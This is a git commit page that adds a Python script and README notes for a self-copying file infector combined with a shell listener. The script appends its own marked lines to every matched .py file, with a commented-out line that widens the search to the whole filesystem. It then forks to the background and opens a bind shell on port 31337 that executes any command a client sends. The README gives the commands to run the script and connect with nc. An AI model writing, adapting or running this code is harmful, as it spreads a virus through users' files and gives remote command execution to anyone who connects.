Putting it all together
This commit is contained in:
id101010
15
README.md
15
README.md
@@ -11,10 +11,23 @@ $ python rshell.py
|
|||||||
```
|
```
|
||||||
|
|
||||||
It will open a reverse shell on port 31337 on the local system. You can connect
|
It will open a reverse shell on port 31337 on the local system. You can connect
|
||||||
to it using `nc 0.0.0.0 31337`.
|
to it using
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ nc 0.0.0.0 31337
|
||||||
|
```
|
||||||
|
|
||||||
## self_copy_test.py
|
## self_copy_test.py
|
||||||
|
|
||||||
Code snippet that searches files based on a search string and copies its
|
Code snippet that searches files based on a search string and copies its
|
||||||
content into all matched files. There is a local `victims` folder for testing
|
content into all matched files. There is a local `victims` folder for testing
|
||||||
purposes.
|
purposes.
|
||||||
|
|
||||||
|
## Putting things together
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ python self_copy_rshell.py
|
||||||
|
```
|
||||||
|
|
||||||
|
Runs code that seraches for victim files and deploys a appends the reverse
|
||||||
|
shell snippet. The example only searches the local `victims` folder.
|
||||||
|
|||||||
66
self_copy_rshell.py
Normal file
66
self_copy_rshell.py
Normal file
@@ -0,0 +1,66 @@
|
|||||||
|
import os #!x
|
||||||
|
import sys #!x
|
||||||
|
import glob #!x
|
||||||
|
import socket #!x
|
||||||
|
import string #!x
|
||||||
|
|
||||||
|
# search command, adjust to your needs
|
||||||
|
#cmd = 'find / -name "*.py" -print' #!x
|
||||||
|
cmd = 'find ./victims -name "*.py" -print' #!x
|
||||||
|
# keyword which prevents file from getting infected
|
||||||
|
keyword = 'plsdontinjectme' #!x
|
||||||
|
|
||||||
|
# for each file that matches the search command
|
||||||
|
for snippet in os.popen(cmd).readlines(): #!x
|
||||||
|
# strip newlines
|
||||||
|
snippet = snippet[:-1] #!x
|
||||||
|
try: #!x
|
||||||
|
# open this file containing the target code
|
||||||
|
code = open(__file__, 'r') #!x
|
||||||
|
# open victim file
|
||||||
|
victim = open(snippet, 'r') #!x
|
||||||
|
# read the content of the victim file
|
||||||
|
read_victim = victim.read() #!x
|
||||||
|
# if the file contains keyword, do not inject code
|
||||||
|
if str.find(read_victim, keyword) == -1: #!x
|
||||||
|
# open it with write_append rights
|
||||||
|
victim = open(snippet, 'a') #!x
|
||||||
|
# for each line in
|
||||||
|
for line in code.readlines(): #!x
|
||||||
|
# if the line contains the copy signal
|
||||||
|
if("#!x") in line: #!x
|
||||||
|
# close the code file
|
||||||
|
code.close() #!x
|
||||||
|
# cast the line containing code
|
||||||
|
insert=(line) #!x
|
||||||
|
# insert the code into the victim file
|
||||||
|
victim.write(insert) #!x
|
||||||
|
# poor mans error handling
|
||||||
|
except IOError: #!x
|
||||||
|
a = 1 #!x
|
||||||
|
|
||||||
|
# fork to bg
|
||||||
|
pid = os.fork() #!x
|
||||||
|
# make sure we are in the child process
|
||||||
|
if pid > 0: #!x
|
||||||
|
sys.exit(0)
|
||||||
|
try: #!x
|
||||||
|
# create the socket and listen
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x
|
||||||
|
s.bind(("0.0.0.0",31337)) #!x
|
||||||
|
s.listen(1) #!x
|
||||||
|
# poor mans socket error handling
|
||||||
|
except socket.error as e: #!x
|
||||||
|
print(e) #!x
|
||||||
|
sys.exit(0) #!x
|
||||||
|
# forever try to accept new connections
|
||||||
|
while 1: #!x
|
||||||
|
(cli,add) = s.accept() #!x
|
||||||
|
info = {"platform":sys.platform, "version":sys.version} #!x
|
||||||
|
welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info) #!x
|
||||||
|
cli.send(welcome.encode('utf-8')) #!x
|
||||||
|
# forever receive cli commends, execute and report back
|
||||||
|
while 1: #!x
|
||||||
|
data = cli.recv(1024).rstrip() #!x
|
||||||
|
resp = os.popen(data.decode('utf-8')).read() #!x
|
||||||
|
cli.send(resp.encode('utf-8')) #!x
|
||||||
Reference in New Issue
Block a user